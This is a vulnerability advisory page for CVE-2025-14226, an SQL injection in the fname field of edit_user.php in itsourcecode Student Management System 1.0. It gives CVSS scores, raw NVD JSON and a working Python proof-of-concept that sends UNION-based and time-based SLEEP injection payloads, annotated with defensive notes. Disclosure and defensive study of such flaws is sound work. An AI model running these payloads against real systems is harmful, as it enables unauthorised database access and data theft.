Security Vulnerability Report
CVE-2025-14226 CVSS 7.3 HIGH

CVE-2025-14226

Published: 2025-12-08 10:16:01
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in itsourcecode Student Management System 1.0. It affects unknown code in the file /edit_user.php: manipulation of the fname argument leads to SQL injection. The attack can be carried out remotely. An exploit is publicly available and may be used. Other parameters may be affected as well.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH score and vector shown here are the secondary (VulDB) CVSS 3.1 assessment. The raw NVD record below also carries a primary NVD CVSS 3.1 score of 9.8 CRITICAL (C:H/I:H/A:H) and a CVSS 4.0 score of 5.5 MEDIUM, so triage should not rely on the headline number alone.

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:student_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Student Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14226 PoC - itsourcecode Student Management System SQL Injection
# Target: edit_user.php fname parameter
#
# NOTE(review): the page served this listing collapsed onto two lines; it is
# reformatted here with conventional indentation and the code itself left
# unchanged.
#
# Defender's view: every request this script sends is an HTTP POST whose
# `fname` form field starts with a single quote followed by `UNION SELECT`
# or `AND SLEEP(`, which is what a WAF rule or an access-log / request-body
# search for this CVE should key on. The application-side fix is to bind the
# `fname` value in /edit_user.php through a parameterised query (prepared
# statement) instead of string concatenation.


def exploit_sqli(url: str, target_user_id: str):
    """
    SQL Injection PoC for CVE-2025-14226
    Target: itsourcecode Student Management System 1.0
    Vulnerable Parameter: fname in /edit_user.php

    Args:
        url: base URL of the target; "/edit_user.php" is appended to it.
        target_user_id: value sent in the `id` form field (a string when
            called from __main__, where it comes straight from sys.argv).

    Returns:
        True when a 200 response body contains one of the version markers
        tested below, False when it does not or the request raised
        RequestException, and (implicitly) None when the server answered
        with any status other than 200 - callers should not treat the
        result as a strict bool.
    """
    # Target URL: the endpoint path is fixed, only the host part varies.
    target_url = f"{url}/edit_user.php"

    # Payload for SQL Injection (UNION-based extraction)
    # Extract database version, user, and current database
    payload = "' UNION SELECT 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15---"

    # Prepare request data: the three form fields the edit form submits.
    # `btn_sub` presumably mimics the submit button - verify against the form.
    data = {
        'fname': payload,
        'id': target_user_id,
        'btn_sub': '1'
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Payload: {payload}")

    try:
        # 10-second cap on the whole request; a slow target surfaces as
        # RequestException (Timeout is a subclass) and is reported below.
        response = requests.post(target_url, data=data, timeout=10)

        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[*] Response length: {len(response.text)}")

            # Check for database info in response.
            # Heuristic only: these are plain substring tests on the whole
            # body, so an unrelated "5.7" or "8.0" anywhere in the page (a
            # footer, a date, a grade) also counts as a hit. A positive here
            # is an indicator, not proof, and should be confirmed manually.
            if '5.7' in response.text or '8.0' in response.text or 'MariaDB' in response.text:
                print("[+] SQL Injection successful - Database version detected!")
                return True
            else:
                print("[-] SQL Injection may have failed - No obvious data leak")
                return False
        # Non-200 status: nothing is printed and the function returns None.

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def blind_sqli_time_based(url: str, target_user_id: str) -> bool:
    """
    Time-based blind SQL injection alternative
    Use when UNION-based injection fails

    Args:
        url: full URL that is POSTed to as given - unlike exploit_sqli, no
            "/edit_user.php" suffix is appended here, so the caller must pass
            the complete endpoint.
        target_user_id: value sent in the `id` form field.

    Returns:
        True when the round trip took 5 seconds or more, False otherwise or
        when any exception was raised.

    Note: this function is defined but never called from the __main__ block
    below, which only runs exploit_sqli.
    """
    # Time-based payload - causes 5 second delay if vulnerable
    payload = "' AND SLEEP(5)---"

    data = {
        'fname': payload,
        'id': target_user_id,
        'btn_sub': '1'
    }

    print(f"[*] Testing time-based blind SQLi...")

    try:
        # Function-local import; only this function needs the clock.
        import time
        start = time.time()
        # `elapsed` is wall-clock time for the whole round trip, so network
        # latency or a generally slow server also counts toward the 5-second
        # threshold; timeout=15 bounds how long this call can block.
        response = requests.post(url, data=data, timeout=15)
        elapsed = time.time() - start

        if elapsed >= 5:
            print(f"[+] Time-based SQL Injection confirmed! \nDelay: {elapsed}s")
            return True
        else:
            print(f"[-] No time delay detected")
            return False

    except Exception as e:
        # Broad catch: timeouts, connection errors and programming errors in
        # this block are all reported the same way and mapped to False.
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    # Two positional arguments are required: base URL and a user id.
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-14226.py <target_url> <user_id>")
        print("Example: python cve-2025-14226.py http://target.com 1")
        sys.exit(1)

    # Trailing slashes are stripped so the "/edit_user.php" join in
    # exploit_sqli does not produce a double slash.
    target_url = sys.argv[1].rstrip('/')
    user_id = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-14226 SQL Injection PoC")
    print("Target: itsourcecode Student Management System 1.0")
    print("Vulnerability: SQL Injection in /edit_user.php fname parameter")
    print("=" * 60)

    # Try UNION-based injection. The return value is ignored, so the exit
    # status is 0 regardless of outcome; only the printed lines report it.
    # blind_sqli_time_based is not invoked here.
    exploit_sqli(target_url, user_id)

    print("\n[*] PoC execution completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14226", "sourceIdentifier": "[email protected]", "published": "2025-12-08T10:16:00.640", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /edit_user.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Other parameters might be affected as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:student_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7816C1E9-D65F-4652-A2F5-27FDEAA6B33D"}]}]}], "references": [{"url": "https://github.com/ltranquility/CVE/issues/17", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.334668", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334668", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.701801", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}